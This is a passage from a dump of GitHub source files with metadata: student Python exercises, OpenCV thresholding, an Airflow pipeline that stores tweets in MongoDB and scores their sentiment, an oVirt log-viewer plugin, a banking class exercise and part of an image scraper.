and the fill color,\n# and draws a square of that size and color to the center of the canvas.\n# create a loop that fills the canvas with rainbow colored squares.\n\nsquare_1 = 20\nsquare_1_color = 'green'\n\nsquare_2 = 50\nsquare_2_color = 'purple'\n\nsquare_3 = 100\nsquare_3_color = 'blue'\n\ndef center_square(x,y):\n square = canvas.create_rectangle (150 - (x/2), 150 - (x/2), 150 + (x/2), 150 + (x/2), fill=y)\n\ncenter_square(square_3, square_3_color)\ncenter_square(square_2, square_2_color)\ncenter_square(square_1, square_1_color)\n\nroot.mainloop()\n","repo_name":"green-fox-academy/AHolcsik","sub_path":"Week03/Day3/rainbow_box_function.py","file_name":"rainbow_box_function.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15132377800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 22:09:48 2017\n\n@author: zhangzhexi\n\"\"\"\n\nimport cv2\n\ndef main():\n image = cv2.imread(\"Test_images/Lenna.png\",1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Input Image',gray)\n cv2.imwrite('Input_image.jpg',gray)\n \n threshold_value = 128\n dst,thresh = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_TRUNC)\n cv2.imshow(\"Threshold Image\", thresh)\n cv2.imwrite(\"Threshold_image.jpg\",thresh)\n\n# Binary Threshold\n dst,thresh_binary = cv2.threshold(gray, threshold_value, 255, cv2.THRESH_BINARY)\n cv2.imshow(\"Binary threshold\", thresh_binary)\n cv2.imwrite(\"Threshold_binary.jpg\", thresh_binary)\n\n# Band Thresholding\n threshold1 = 27\n threshold2 = 125\n dst,binary_image_1 = cv2.threshold(gray, threshold1, 255, cv2.THRESH_BINARY)\n dst,binary_image_2 = cv2.threshold(gray, threshold2, 255, cv2.THRESH_BINARY_INV)\n band_thresholded_image = cv2.bitwise_and(binary_image_1,binary_image_2)\n cv2.imshow(\"Band Thresholding\", band_thresholded_image)\n cv2.imwrite(\"Band_Thresholding.jpg\", band_thresholded_image)\n\n# Semi Thresholding\n current_threshold = 128\n max_threshold = 255;\n dst,semi_thresholded_image = cv2.threshold(gray,current_threshold,max_threshold,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)\n semi_thresholded_image = cv2.bitwise_and(gray,semi_thresholded_image)\n cv2.imshow(\"Semi Thresholding\",semi_thresholded_image)\n cv2.imwrite(\"Semi_Thresholding.jpg\",semi_thresholded_image)\n\n# Adaptive Thresholding\n adaptive_thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,101,10)\n cv2.imshow(\"Adaptive Thresholding\", adaptive_thresh)\n cv2.imwrite(\"Adaptive_Thresholding.jpg\", adaptive_thresh)\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"zzx0921/EC601_OpenCV","sub_path":"Exercise4/Threshold.py","file_name":"Threshold.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34741969477","text":"import pyvirtualdisplay\r\n_display = pyvirtualdisplay.Display(visible=False, size=(1400, 900))\r\n_ = _display.start()\r\nimport gym\r\nfrom gym.utils.play import play\r\nenv = gym.make(\"CartPole-v0\")\r\nplay(env, zoom=4)\r\nimport ray\r\nfrom ray import tune\r\nfrom ray.rllib.agents.dqn import DQNTrainer\r\n\r\nray.shutdown()\r\nray.init(\r\n include_webui=False,\r\n ignore_reinit_error=True,\r\n object_store_memory=8 * 1024 * 1024 * 1024 # 8GB limit … feel free to increase this if you can\r\n)\r\n\r\nENV = 'Humanoid-v1'\r\nTARGET_REWARD = 195\r\nTRAINER = 
DQNTrainer\r\n\r\ntune.run(\r\n TRAINER,\r\n stop={\"episode_reward_mean\": TARGET_REWARD}, # stop as soon as we \"solve\" the environment\r\n config={\r\n \"env\": ENV,\r\n \"num_workers\": 0, # run in a single process\r\n \"num_gpus\": 0,\r\n \"monitor\": True, # store stats and videos periodically\r\n \"evaluation_num_episodes\": 25, # every 25 episodes instead of the default 10\r\n }\r\n)\r\nfrom base64 import b64encode\r\nfrom pathlib import Path\r\nfrom typing import List\r\n\r\n# this will depend on which provider you are using; the correct version is\r\n# probably what you get if you append /ray/results/ to the output from !pwd\r\nOUT_PATH = Path('/root/ray_results/')\r\n\r\ndef latest_experiment() -> Path:\r\n \"\"\" Get the path of the results directory of the most recent training run. \"\"\"\r\n experiment_dirs = []\r\n for algorithm in OUT_PATH.iterdir():\r\n if not algorithm.is_dir():\r\n continue\r\n for experiment in algorithm.iterdir():\r\n if not experiment.is_dir():\r\n continue\r\n experiment_dirs.append((experiment.stat().st_mtime, experiment))\r\n return max(experiment_dirs)[1]\r\n\r\ndef latest_videos() -> List[Path]:\r\n # because the ISO timestamp is in the name, the last alphabetically is the latest\r\n return list(sorted(latest_experiment().glob('*.mp4')))\r\n\r\ndef render_mp4(videopath: Path) -> str:\r\n mp4 = open(videopath, 'rb').read()\r\n base64_encoded_mp4 = b64encode(mp4).decode()\r\n return f'
<video width=400 controls><source src=\"data:video/mp4;base64,{base64_encoded_mp4}\" type=\"video/mp4\">{videopath.name}</video>
    '\r\n\r\n\r\nfrom IPython.display import HTML\r\nhtml = render_mp4(latest_videos()[-1])\r\nHTML(html)","repo_name":"shivamkainth/rescience","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26768411180","text":"'''Association example\n--Create a class Hardware with tow attributes 'name','installed_date'\nand add a method show_hardware which will show name and date\n\n--Create a class software with three attribute 'software_name','version','installed_date'\nand a method SHOW_Software which will show name,version and date\n\n--Create a class Computer with few attributes like 'name,'manufacture','location 'etc\nand two attributes one for hardware and one for software\n(list Type) and 5 function, for setting hardware,software,showing list of hardware,list of software and\nDisplay full specifications of the computer\n'''\n\n\nclass Hardware:\n\n def __init__(self):\n\n self.name = ''\n self.installed_date = ''\n self.list_of_hardware = []\n\n def show_hardware(self,name,installed_date):\n\n self.list_of_hardware.append(name)\n self.list_of_hardware.append(installed_date)\n\n\nclass Software:\n\n def __init__(self):\n\n self.software_name = ''\n self.version = 0\n self.installed_date = ''\n self.list_of_software=[]\n\n def show_software(self,software_name,version,installed_date):\n\n self.list_of_software.append(software_name)\n self.list_of_software.append(version)\n self.list_of_software.append(installed_date)\n\n\nclass Computer:\n\n def __init__(self,name,manufacturer,location):\n\n self.name = name\n self.manufacturer = manufacturer\n self.location = location\n self.clasHadw = Hardware()\n self.clasSoft = Software()\n\n def setting_hardware(self):\n\n print('Setting Hardware',self.clasHadw.list_of_hardware)\n print()\n\n def setting_software(self):\n\n print('Setting Software',self.clasSoft.list_of_software)\n print()\n\n def list_of_hardware(self):\n\n print('List Of Hardware: ')\n\n for hadw_list in self.clasHadw.list_of_hardware:\n print(hadw_list)\n print()\n\n def list_of_software(self):\n\n print('List of Software: ')\n\n for soft_list in self.clasSoft.list_of_software:\n print(soft_list)\n print()\n\n def show_full_specification(self):\n\n print(self.name,self.manufacturer,self.location,'contains:')\n print(self.clasHadw.list_of_hardware)\n print(self.clasSoft.list_of_software)\n\n\n\ncomp = Computer('Usman-PC','DEll','Karachi')\n\ncomp.clasHadw.show_hardware('Lan Card','Feb 5')\ncomp.clasHadw.show_hardware('Graphic Card','Jan 18')\ncomp.clasHadw.show_hardware('DVD Rom','March 18')\n\ncomp.setting_hardware()\ncomp.list_of_hardware()\n\ncomp.clasSoft.show_software('Pycharm',2.4,'Dec 2')\ncomp.clasSoft.show_software('MS office',2016,'Aril 19')\n\ncomp.setting_software()\ncomp.list_of_software()\n\ncomp.show_full_specification()","repo_name":"Mohammed-Usman/PythonCrashCourseTasks","sub_path":"association.py","file_name":"association.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27211917034","text":"#Written by Karan Jagdale, Undergraduate, IIT Bombay. 
\nimport serial\nimport io\nser=serial.Serial('/dev/ttyACM0',19200)\n\n\ndef bintodec(k,l):\n\tdecimal = 0\n\tbinary = []\n\tfor i in range(4):\n\t\tnzeros = 10 - len((k[l-i]))\n\t\tprint(nzeros)\n\t\tfor j in range(nzeros):\n\t\t\tbinary.append(0)\n\t\tfor j in range(len(k[l-i])-2):\n\t\t\t\tbinary.append(int((k[l-i][j+2]))) #Not appending initial 0b\n\tprint(binary)\n\tif(binary[0]==1):\n\t\tfor i in range(len(binary)):\n\t\t\tif(binary[i] == 1):\n\t\t\t\tbinary[i] = 0\n\t\t\telse:\n\t\t\t\tbinary[i] = 1\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\treturn -(decimal+1)\n\t\n\telse:\n\t\tfor i in range(len(binary)):\n\t\t\tdecimal = decimal + int(binary[i])*pow(2,(len(binary)-(i+1)))\n\t\t\n\t\treturn decimal\n\t\t\n\n \ndef main():\n\ts = ser.read(26)\n\t#for i in s:\n\ts1 = map(bin,bytearray(s))\n\tN = bintodec(s1,17)\n\tE = bintodec(s1,21)\n\tD = bintodec(s1,25)\n\tprint(s1)\n\tprint(N,E,D)\nmain()\n\n\n\n\n\n\n\n#print(' '.join(format(ord(x), 'b') for x in s))\n#ser = io.BytesIO(b\"some initial binary data: \\x00\\x01\")\n#print(ser[0])\n#print(ord(s))\n#print(toBinary(s))\t#print((s1))\n\t#print(type(s1[0]))\n\t#print((s1[0][1]),int((s1[0][2])),(s1[0][3]))\nser.close()\n","repo_name":"KaranJagdale/Inertial-Snensors-Implementation","sub_path":"GPSDataLogging.py","file_name":"GPSDataLogging.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1032769706","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify,abort\nimport sys\nimport time\nimport json\nimport thread\n\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/keyword/',methods=['GET'])\ndef keyword(task_id):\n f = open('hehe.txt')\n keywords = task_id.split(' ')\n result = []\n for line in f:\n re = {}\n content = line.split(\"\\t\")\n if len(content) == 2:\n re['title'] = content[1]\n re['labels'] = [\"0\"]\n re['time'] = \"0\"\n re['href'] = \"0\"\n result.append(re)\n for word in keywords:\n if word in line:\n re['title'] = content[0]\n re['labels'] = content[1].split(\",\")\n re['time'] = content[2]\n re['href'] = content[3]\n result.append(re)\n break\n\n # print type(str(result).replace('u\\'','\\'').decode(\"unicode-escape\"))\n return json.dumps(result)\n\n@app.route('/api/v1.0/upload/',methods=['GET'])\ndef upload(task_id):\n f = open(\"hehe.txt\",\"a\")\n keyword = task_id.split(\" \")\n f.write(str(keyword[0]) + \"\\t\" + str(keyword[1])+\"\\n\")\n return \"1\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0',debug=True)\n\n","repo_name":"AndyShan/MyHeadline","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16577787516","text":"# Twitter ELT Pipeline\r\n# -----------------------------------------------------------------------\r\n# Imports\r\nfrom pymongo import MongoClient\r\nfrom airflow import DAG\r\nimport tweepy\r\nfrom textblob import TextBlob\r\nimport pandas as pd\r\nfrom airflow.operators.python import PythonOperator\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n# -----------------------------------------------------------------------\r\n# Airflow SetUP\r\n\r\n# Set default_args dictionary\r\ndefault_args = {\r\n # Owner of the DAG\r\n \"owner\": \"me\", \r\n # Start time \r\n \"start_date\": datetime.now(), \r\n \"depends_on_past\": False,\r\n # 
Retries are disabled\r\n \"retries\": 0,\r\n # If it retries, it waits a tenth of a minute to retry\r\n \"retry_delay\": timedelta(minutes=0.1), \r\n}\r\n\r\n# Creating a DAG called TWITTER_MONGO_DAG that is schedule to \r\n# repeat each minute\r\ndag = DAG(\r\n \"TWITTER_MONGO_DAG\",\r\n default_args=default_args,\r\n # Runs every minute\r\n schedule_interval=timedelta(minutes=1)\r\n)\r\n# -----------------------------------------------------------------------\r\n# Function to scrap tweets and store them in Mongo DB\r\ndef request_to_mongo():\r\n # Login Credentials for the Twitter API\r\n\r\n # Set up API credentials for Twitter API\r\n consumer_key = 'enter-consumer-key-here' \r\n consumer_secret = 'enter-consumer-secret-here'\r\n access_token = 'enter-access-token-here'\r\n access_token_secret = 'enter-access-token-secret-here'\r\n\r\n # Authenticate using the Twitter API\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth)\r\n\r\n client = MongoClient(host='host.docker.internal', port=27017) # connecting client to an internal port within docker where airflow is being run\r\n\r\n # Create new Database in MongoDB called \"mydatabase\"\r\n db = client['mydatabase']\r\n\r\n # Create the collection in MongoDB for the tweets\r\n collection = db['tweets']\r\n\r\n # Get the tweets from the OpenAI Twitter account\r\n searcht = api.search_tweets(q=\"ChatGPT -filter:retweets\", lang='en', count = 100)\r\n\r\n current = []\r\n # Collect the current tweets in the Mongo DB\r\n for doc in collection.find():\r\n current.append(doc['_id'])\r\n # Search through the new and current tweets to ensure no duplicates are\r\n # into Mongo\r\n for tweet in searcht:\r\n if tweet.id in current:\r\n pass\r\n else:\r\n # Create a dictionary for each tweet\r\n tweet_info = {}\r\n # Tweet ID\r\n tweet_info[\"id\"] = tweet.id\r\n # Date the Tweet was tweeted\r\n tweet_info[\"created_at\"] = tweet.created_at\r\n # Text of the Tweet\r\n tweet_info[\"text\"] = tweet.text\r\n # ID of the user that Tweeted the tweet\r\n tweet_info[\"user_id\"] = tweet.user.id\r\n # Location of the user that tweeted\r\n tweet_info[\"location\"] = tweet.user.location\r\n # FOllwoer count of the user that tweeted\r\n tweet_info[\"followers_count\"] = tweet.user.followers_count\r\n # The number of tweets the user has tweeted\r\n tweet_info[\"statuses_count\"] = tweet.user.statuses_count\r\n # When the user created their account\r\n tweet_info[\"user_creation\"] = tweet.user.created_at\r\n # The hashtags included in the tweet\r\n tweet_info[\"hashtags\"] = [hashtag[\"text\"] for hashtag in tweet.entities.get(\"hashtags\")]\r\n # URLs in the tweet\r\n tweet_info[\"urls\"] = [url[\"expanded_url\"] for url in tweet.entities.get(\"urls\")]\r\n # Users mentioned in the tweet\r\n tweet_info[\"user_mentions\"] = [user_mention[\"screen_name\"] for user_mention in tweet.entities.get(\"user_mentions\")]\r\n # Whether the tweet contains media\r\n tweet_info[\"media\"] = [media.media_url for media in tweet.entities.get(\"media\")] if hasattr(tweet, \"media\") else None\r\n # Whether the tweet contains a poll\r\n tweet_info[\"polls\"] = [poll.options for poll in tweet.polls()] if hasattr(tweet, \"polls\") else None\r\n # The number of retweets the tweet has\r\n tweet_info[\"retweet_count\"] = tweet.retweet_count\r\n # The number of likes the tweet has\r\n tweet_info[\"favorite_count\"] = tweet.favorite_count\r\n \r\n # Inserting the data into the database in 
MongoDB\r\n collection.insert_one(tweet_info)\r\n# -----------------------------------------------------------------------\r\n# Function to conduct sentiment analysis on the Tweets\r\ndef sentimental():\r\n\r\n # Connecting client to an internal port within docker where airflow is being run\r\n client = MongoClient(host='host.docker.internal', port=27017) \r\n\r\n # Connecting to the MongoDB\r\n db = client['mydatabase']\r\n\r\n # Connecting to the \"tweets\" collection in MongoDB\r\n collection = db['tweets']\r\n\r\n # Gathering all the data from the database\r\n data = collection.find()\r\n\r\n # Create lists to store the tweet id, tweet text and date of tweet\r\n id_list = []\r\n text_list = []\r\n date_list = []\r\n \r\n # Appenind the id, text and date to lists\r\n for d in data:\r\n id_list.append(d['_id'])\r\n text_list.append(d['text'])\r\n date_list.append(d['created_at'])\r\n\r\n# ---------------------------------------------------------------\r\n# Sentiment Analysis\r\n # Create lists to store the sentiment scores, tweet text and date of tweet\r\n sentiment_data_list = []\r\n text_data_list = []\r\n date_data_list = []\r\n\r\n # Conduct sentiment analysis on the tweets and store each sentiment score (polarity,subjectivity)\r\n for i in range(len(text_list)):\r\n # Text blob handles the sentiment analysis of the tweets\r\n tweet_blob = TextBlob(text_list[i])\r\n # Extracting the polarity and subjectivity scores\r\n polarity, subjectivity = tweet_blob.sentiment\r\n\r\n # Classifying the sentiment (Postive, Negative, Neutral)\r\n if polarity > 0:\r\n sentiment = \"Positive\"\r\n elif polarity == 0:\r\n sentiment = \"Neutral\"\r\n else:\r\n sentiment = \"Negative\"\r\n\r\n # # Storing the sentiment scores, tweet text and tweet dates in a dictionary\r\n sentiment_data = {\"tweet_id\": id_list[i], \"polarity score\": polarity, \"sentiment\": sentiment, \"subjectivity score\": subjectivity}\r\n text_data = {\"tweet_id\": id_list[i], 'tweet_content': text_list[i]}\r\n date_data = {\"tweet_id\": id_list[i], 'tweet_date': date_list[i]}\r\n\r\n sentiment_data_list.append(sentiment_data)\r\n text_data_list.append(text_data)\r\n date_data_list.append(date_data)\r\n\r\n\r\n # Storing the sentiment scores, tweet text and tweet dates in a dataframe\r\n sentiment_df = pd.DataFrame(sentiment_data_list)\r\n text_df = pd.DataFrame(text_data_list)\r\n date_df = pd.DataFrame(date_data_list)\r\n\r\n # Choose folder path to store the dataframes\r\n folder_path = 'insert-folder-path-here'\r\n\r\n # Save the DataFrame as a CSV file in the specified folder\r\n sentiment_df.to_csv(folder_path + '/sentiment_scores.csv', index=False)\r\n text_df.to_csv(folder_path + '/tweets.csv', index=False)\r\n date_df.to_csv(folder_path + '/dates.csv', index=False)\r\n\r\n# ---------------------------------------------------------------\r\n# Airflow Tasks\r\n\r\n# task1: calls the Twitter API and stores the tweets into MongoDB\r\ntask1 = PythonOperator(\r\n task_id = 'twit_mongo',\r\n python_callable=request_to_mongo,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\n# task2: extracts the data from the MongoDB and conducts sentiment analysis on the tweets\r\ntask2 = PythonOperator(\r\n task_id = 'sentimental_analysis',\r\n python_callable=sentimental,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\ntask2.set_upstream(task1)\r\n# 
---------------------------------------------------------------\r\n","repo_name":"georgelopez7/Twitter-Data-ELT","sub_path":"twitter-ELT-airflow.py","file_name":"twitter-ELT-airflow.py","file_ext":"py","file_size_in_byte":7964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3213264872","text":"from ovirt.node import ui\nfrom ovirt.node.plugins import NodePlugin\nfrom ovirt.node.utils import process, system\n\n\"\"\"\nA plugin for a support page\n\"\"\"\n\n\nclass Plugin(NodePlugin):\n def __init__(self, application):\n # Register F8: Display this plugin when F( is pressed\n show_plugin = lambda: application.switch_to_plugin(self)\n application.ui.register_hotkey([\"f8\"], show_plugin)\n super(Plugin, self).__init__(application)\n\n def name(self):\n return _(\"Support\")\n\n def rank(self):\n return 999\n\n def has_ui(self):\n return False\n\n def ui_content(self):\n ws = [ui.Header(\"header[0]\", _(\"Support Info\")),\n ui.Label(\"support.info\", _(\"Select one of the logfiles below.\")),\n ui.Divider(\"divider[0]\"),\n ui.Table(\"support.logfile\", \"\", _(\"Available Logfiles\"),\n self.__debugfiles_to_offer()),\n ]\n\n page = ui.Page(\"page\", ws)\n page.buttons = []\n self.widgets.add(page)\n return page\n\n def model(self):\n return {}\n\n def validators(self):\n return {}\n\n def on_change(self, changes):\n pass\n\n def on_merge(self, changes):\n if changes.contains_any([\"support.logfile\"]):\n logfile = changes[\"support.logfile\"]\n cmds = {\"node\": \"cat /var/log/ovirt.log | less\",\n \"ui\": \"cat /var/log/ovirt-node.log | less\",\n \"messages\": \"cat /var/log/messages | less\",\n \"audit\": \"cat /var/log/audit/audit.log | less\",\n \"dmesg\": \"dmesg | less\",\n \"journal\": \"journalctl --all --catalog --full\"\n }\n\n cmd = cmds[logfile] if logfile in cmds else None\n\n if cmd:\n contents = process.check_output(cmd, shell=True,\n stderr=process.STDOUT)\n return ui.TextViewDialog(\"output.dialog\", _(\"Logfile\"),\n contents)\n\n def __debugfiles_to_offer(self):\n items = [(\"node\", \"/var/log/ovirt.log\"),\n (\"ui\", \"/var/log/ovirt-node.log\"),\n (\"dmesg\", \"dmesg\"),\n (\"audit\", \"/var/log/audit/audit.log\")]\n\n if system.has_systemd():\n items.append((\"journal\", \"journal (systemd)\"))\n else:\n items.append((\"messages\", \"/var/log/messages\"))\n\n return items\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/setup/core/support_page.py","file_name":"support_page.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"40300518138","text":"\r\nfrom mimetypes import init\r\n\r\n\r\nclass Bank :\r\n bankID = -1\r\n allBanks = set([])\r\n def __init__(self,bankFullName,bankAbbrivation):\r\n self.bankFullName = bankFullName\r\n self.bankAbbrivation = bankAbbrivation\r\n bankID+=1\r\n self.bankID = bankID\r\n\r\n @staticmethod\r\n def findBank(bankAbbrivation):\r\n for i in Bank.allBanks:\r\n if i.bankAbbrivation == bankAbbrivation:\r\n return True,i\r\n return False\r\n\r\n @staticmethod\r\n def createNewBank(bankName,bankAbbrivation):\r\n newBank = Bank(bankName,bankAbbrivation)\r\n if(Bank.allBanks.add(newBank)==False):\r\n print(\"Bank already exits!!\")\r\n return False\r\n return True\r\n\r\nclass Account:\r\n accountNumber = 0\r\n def __init__(self,bank):\r\n self.accountNumber = Account.accountNumber\r\n self.bank = bank\r\n self.balance = 1000\r\n def 
isAccountExists(self,bankAbbrivation):\r\n return self.bank.bankAbbrivation == bankAbbrivation\r\n\r\n def displayAccountBalance(self):\r\n print(\"Account Balance is \"+self.balance)\r\n\r\n def isSufficientBalace(self,amount):\r\n return self.balance>=amount\r\n\r\n def updateAccountBalance(self,amount,operation):\r\n if operation==\"Add\":\r\n self.balance+=amount\r\n else:\r\n self.balance-=amount\r\n return\r\n\r\n @staticmethod\r\n def createNewAccount(bankAbbrivation):\r\n isBankExits,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExits:\r\n print(\"The given bank name doest not exits!!\")\r\n return False\r\n newAccount = Account(bankObj)\r\n return newAccount\r\n\r\n\r\nclass Customer:\r\n customerID = -1\r\n allCustomers = []\r\n def __init__(self,firstName,lastName,totalBalance,userName):\r\n customerID+=1\r\n self.customerID = Customer.customerID\r\n self.firstName = firstName\r\n self.lastName = lastName\r\n self.totalBalance = totalBalance\r\n self.accounts = []\r\n self.userName = userName\r\n \r\n @staticmethod\r\n def findCustomer(self,userName):\r\n for customer in Customer.allCustomers:\r\n if customer.userName == userName:\r\n return True,customer\r\n \r\n return False\r\n \r\n\r\n\r\n def findAccount(self,bankAbbrivation):\r\n for account in self.accounts:\r\n if account.bank.bankAbbrivation == bankAbbrivation:\r\n return True,account\r\n return False\r\n \r\n def createNewAccount(self,bankAbbrivation):\r\n isAccountExists,_ = self.findAccount(bankAbbrivation)\r\n if isAccountExists:\r\n print(\"account already exits in this bank!! \")\r\n return \r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if isBankExists :\r\n return \r\n newAccount = Account.createNewAccount(bankAbbrivation)\r\n self.accounts.append(newAccount)\r\n return True,newAccount\r\n\r\n def deposit(self,bankAbbrivation,amount):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be deposited as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n account.updateAccountBalance(amount,\"Add\")\r\n print(\"Amount has been deposited in your accout successfully\")\r\n self.__updateTotalBalace()\r\n return True\r\n print(\"cannot deposit the amount as the account does not exits\")\r\n return False\r\n\r\n def Withdraw(self,amount,bankAbbrivation):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be withdraw as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n if account.isSufficientBalace(amount):\r\n account.updateAccountBalance(amount,\"subtract\")\r\n print(\"Amount has been withdrawn from your account successfully!!\")\r\n self.__updateTotalBalace()\r\n return True\r\n\r\n print(\"Insufficient account balance!\")\r\n return \r\n print(\"cannot withdraw the amount as the account does not exits\")\r\n return False\r\n \r\n def transferAmount(self,creditCustomerUserName,creditCustomerBankName,debitCustomerBankName,amount):\r\n if Customer.findCustomer(creditCustomerUserName) and Customer.findCustomer(debitCustomerBankName):\r\n customerObj = Customer.findCustomer(creditCustomerBankName)\r\n self.Withdraw(debitCustomerBankName,amount)\r\n customerObj.deposit(creditCustomerUserName,amount)\r\n return True\r\n print(\"cannot transfer the amount\")\r\n return False\r\n\r\n def 
selfTransfer(self,creditBankName,debitBankName,amount):\r\n if Bank.findBank(creditBankName) and Bank.findBank(debitBankName):\r\n self.Withdraw(debitBankName,amount)\r\n self.deposit(creditBankName,amount)\r\n return True\r\n print(\"cannot transfer the amount!\")\r\n return False\r\n\r\n def __updateTotalBalace(self):\r\n self.totalBalance = 0\r\n for account in self.accounts:\r\n self.totalBalance+=account.balance\r\n return self.totalBalance\r\n \r\n\r\n def displayBalance(self):\r\n print(self.firstName+\" your account balance is \"+self.totalBalance)\r\n for account in self.accounts:\r\n account.displayBalance()\r\n \r\n\r\n","repo_name":"Sahil8317/Forcepoint-Training-Assignments","sub_path":"BankingApp.py","file_name":"BankingApp.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22208067626","text":"from bs4 import *\nfrom pathlib import PurePath\nimport requests\nimport sys\nimport os\n\nclass bcolors:\n OK = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n RESET = \"\\033[0m\"\n\ndef get_links(url, url_links, dominio):\n try:\n response = requests.get(url)\n except:\n print(bcolors.FAIL + \"Error: invalid URL\" + bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n links = soup.findAll('a')\n for tag in links:\n cut = tag.get('href')\n if cut != None:\n if dominio in cut:\n url_links.append(cut)\n elif cut.startswith('/') == True:\n cut = \"https://\" + dominio + cut\n url_links.append(cut)\n return (url_links)\n \ndef get_images(url_links, dominio):\n url_images = []\n for link in url_links:\n try:\n response = requests.get(link)\n except:\n print(bcolors.FAIL + \"Error: invalid URsL \" + link +bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n images = soup.findAll('img')\n for tag in images:\n cut = tag.get('src')\n if cut != None and len(cut) > 0:\n if cut.endswith(\".png\") or cut.endswith(\".gif\") or cut.endswith(\".bmp\") or cut.endswith(\".jpg\" or cut.endswith(\".jpeg\")):\n if cut.startswith('//') == True:\n cut = cut[2:]\n if dominio in cut:\n if cut.startswith(\"https\") == False:\n cut = \"https://\" + cut\n url_images.append(cut)\n elif cut.startswith('/') and \".com\" != cut:\n cut = \"https://\" + dominio + cut\n url_images.append(cut)\n return url_images\n\ndef check(rec):\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n url_images = []\n url_links = []\n \n if (len(sys.argv) == 1):\n print(bcolors.FAIL + \"Error: please insert a URL\" + bcolors.RESET)\n exit()\n elif \"-r\" != opts:\n url = sys.argv[len(sys.argv) - 1]\n if url.endswith(\"/\") == False:\n url = url + '/'\n if url.startswith(\"http\") == False:\n url = \"https://\" + url\n\n dominio = url[url.index('/') + 2:-1]\n \n if rec != 0 and len(url_links) < int(rec):\n x = 0\n url_links = get_links(url, url_links, dominio)\n while len(url_links) < int(rec):\n url_links = get_links(url_links[x], url_links, dominio)\n x += x\n result = []\n for link in url_links:\n if link not in result:\n result.append(link)\n if len(result) < int(rec):\n print(bcolors.WARNING + \"Warning: has requested recursion \" + str(rec) + \" but only \" + str(len(result)) + \" urls with the supplied domain are valid\" + bcolors.RESET)\n url_links = result\n else:\n url_links.append(url)\n url_images = get_images(url_links, dominio)\n return url_images\n\ndef clean_folder(path, content):\n for file in content:\n os.remove(path + '/' + 
file)\n\ndef download_image(folder, url, name):\n path = os.getcwd() + '/'+ folder\n if os.path.exists(path) == False:\n os.mkdir(folder)\n name = folder + '/' + name\n f = open(name,'wb')\n try:\n response = requests.get(url)\n f.write(response.content)\n except:\n print(bcolors.WARNING + \"Invalid URL \", url + bcolors.RESET)\n return 0\n f.close()\n return 1\n\ndef main():\n opts = [opt for opt in sys.argv[1:]]\n if \"-p\" in opts:\n try:\n folder = opts[opts.index(\"-p\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid folder\" + bcolors.RESET)\n exit()\n if folder.startswith(\"-\"):\n print(bcolors.FAIL + \"Error: invalid name for folder\" + bcolors.RESET)\n exit()\n else:\n folder = \"data\"\n\n if \"-l\" in opts:\n if \"-r\" not in opts:\n print(bcolors.FAIL + \"Error: \\\"-l\\\" specified but no recursivity \\\"-r\\\"\" + bcolors.RESET)\n exit()\n else:\n try:\n rec = opts[opts.index(\"-l\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n if rec.isnumeric() == False:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n elif \"-r\" in opts:\n rec = 5\n else:\n rec = 0\n\n url_images = check(rec)\n if url_images == None:\n exit()\n else:\n x = 0\n path = os.getcwd() 